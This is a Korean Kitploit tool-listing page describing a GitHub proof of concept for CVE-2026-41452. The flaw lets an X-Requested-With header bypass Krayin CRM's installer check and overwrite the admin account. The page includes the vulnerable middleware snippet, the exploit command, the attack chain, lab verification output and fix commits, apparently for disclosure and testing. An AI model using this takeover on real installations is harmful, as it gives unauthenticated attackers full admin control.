Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41452-PoC — CVE-2026-41452 — Krayin CRM 비인증 설치 프로그램 우회(X-Requested-With) → 관리자 계정 탈취. 검증됨: 2.2.4에서 덮어쓰기 + 로그인, 2.2.5에서 차단됨 | Kitploit
도구/GitHubGitHub/boreas37/cve-2026-41452-poc
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubboreas37/cve-2026-41452-poc

CVE-2026-41452-PoC

CVE-2026-41452 — Krayin CRM 비인증 설치 프로그램 우회(X-Requested-With) → 관리자 계정 탈취. 검증됨: 2.2.4에서 덮어쓰기 + 로그인, 2.2.5에서 차단됨

저장소 보기
41229일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41452 — Krayin CRM 설치 프로그램 인증 우회 → 관리자 탈취

CVSS 9.8 (치명적) · CWE-287 / CWE-306 · Jiva 분석 · VulnCheck 권고

요약

Krayin CRM의 설치 프로그램은 POST /install/api/admin-config-setup (및 run-migration, run-seeder)을 CSRF 보호 없이 (withoutMiddleware('web') 그룹) 노출합니다. CanInstall 전역 미들웨어는 AJAX가 아닌 요청에 대해서만 해당 라우트를 차단합니다:

root@kitploit:~
// app/Http/Middleware/CanInstall.php
if ($this->isAlreadyInstalled() && ! $request->ajax()) {
    return redirect()->route('admin.dashboard');
}

X-Requested-With: XMLHttpRequest 헤더를 보내면 이 검사가 완전히 우회됩니다. 그러면 컨트롤러는 **하드코딩된 기본 관리자(사용자 id=1)**를 공격자가 제공한 이름/이메일/비밀번호 (role_id=1, status=1)로 updateOrInsert합니다 → 이미 설치된 인스턴스에서 인증 없는 완전한 관리자 탈취가 가능합니다.

영향받는 버전: ≤ 2.2.0 및 2.2.4 (회귀). 수정: 2.2.1 (e4eb96f5), 2.2.4에서 회귀 (6a7bc4cc), 2.2.5에서 재수정 (ea4919a8). 연구 시점에 master 브랜치는 여전히 취약했습니다.

익스플로잇

root@kitploit:~
python3 poc_cve-2026-41452.py http://TARGET newadmin [email protected] 'NewPass@123'

공격 체인:

  1. 기준: AJAX가 아닌 POST → 차단됨(302 리디렉션) — 미들웨어가 일반 요청에 대해 정상 동작함을 증명
  2. AJAX POST X-Requested-With: XMLHttpRequest → HTTP 200 1 → 관리자(id=1) 덮어쓰기
  3. 새 자격 증명으로 /admin/login에 로그인 → /admin/dashboard로 리디렉션
  4. 대시보드가 렌더링됨 → 탈취 확인

검증 (2026-08-12, Docker 랩, ARM64)

root@kitploit:~
[0] NON-AJAX POST -> HTTP 302 (blocked by CanInstall)        [OK control]
[1] AJAX POST /install/api/admin-config-setup -> HTTP 200 '1' [OK overwrite]
[2] login [email protected] -> HTTP 302 /admin/dashboard          [OK]
[3] GET /admin/dashboard -> HTTP 200 (full dashboard)          [OK]
=== VERDICT: CVE-2026-41452 EXPLOITABLE ===

수정된 빌드 비교: v2.2.5 파일에서는 동일한 AJAX POST → HTTP 403 (차단됨).

영향

공개적으로 접근 가능한 모든 Krayin CRM 설치본(v2.2.4 또는 ≤2.2.0)은 인증되지 않은 공격자에 의해 단 한 번의 요청으로 완전히 장악될 수 있습니다. CSRF도, 자격 증명도, 사용자 상호작용도 필요하지 않습니다.

참고 자료

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41452
  • Jiva Security 분석: https://jivasecurity.com/writeups/krayin-installer-bypass-account-takeover-cve-2026-41452
  • VulnCheck 권고: https://www.vulncheck.com/advisories/krayin-crm-missing-authentication-via-install-api-admin-config-setup
  • 수정: ea4919a8 (v2.2.5) · 회귀: 6a7bc4cc (v2.2.4) · 최초 수정: e4eb96f5 (v2.2.1)
도구 다운로드